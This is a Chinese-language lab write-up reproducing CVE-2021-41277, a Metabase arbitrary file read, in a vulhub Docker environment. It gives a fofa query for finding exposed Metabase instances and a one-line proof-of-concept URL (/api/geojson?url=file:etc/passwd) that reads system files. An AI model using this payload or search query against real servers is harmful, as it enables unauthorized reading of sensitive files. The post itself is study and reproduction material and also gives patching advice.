【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现

本来说最近安心备赛的,但看到官方的国庆活动又跑回来写文章了。萌新起步,如有不对欢迎大佬多多指导。

文章目录

  • 漏洞信息

  • fofa语法

  • 环境搭建

  • POC
  • 漏洞复现
  • 总结


漏洞信息

Metabase是美国Metabase公司的一个开源数据分析平台。

Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。

  • CNNVD编号:CNNVD-202111-1565
  • 危害等级: 超危
  • CVE编号: CVE-2021-41277
  • 简述: 在受影响的版本中,自定义GeoJSON地图(' admin->settings->maps->custom maps->add a map ')存在本地文件包含(包括环境变量)漏洞,url在加载之前没有经过验证,攻击者利用该漏洞能够读取任意文件。

影响版本

组件 影响版本 安全版本
metabase:metabase >=1.0.0 & <1.40.5 >=1.40.5
metabase:metabase <0.40.5 >= 0.40.5

fofa搜索语法

app="Metabase"

 【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第1张图片

 环境搭建

  1. 进入目标目录:cd /root/桌面/vulhub-master/metabase/CVE-2021-41277/
  2. 打开dockers容器:docker-compose up -d
  3. 查看主机IP地址:ifconfig
  4. 查看容器开启的端口:docker ps
  5. 地址加端口查看服务:http://192.168.162.129:3000

 示例:

【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第2张图片

注册一个账号:(邮箱什么的随便输入就行了)

示例:

【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第3张图片

 跳过数据库填写:

【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第4张图片

最后一步完成操作,然后进入这个页面:

示例:

【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第5张图片

POC:

http://your-ip:3000/api/geojson?url=file:etc/passwd

 漏洞复现

打开抓包软件,对输入poc的页面进行抓包,并发送数据包即可达成任意文件读取的目的。

示例:

【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现_第6张图片

 至此复现结束

总结及修复建议

修复建议:根据影响版本的信息查看,并升级到最新版本

总结:又是一次复现,日常求关注,欢迎各位大佬指点。谢谢。

你可能感兴趣的:(记录一下vulhub靶场复现,网络安全,安全)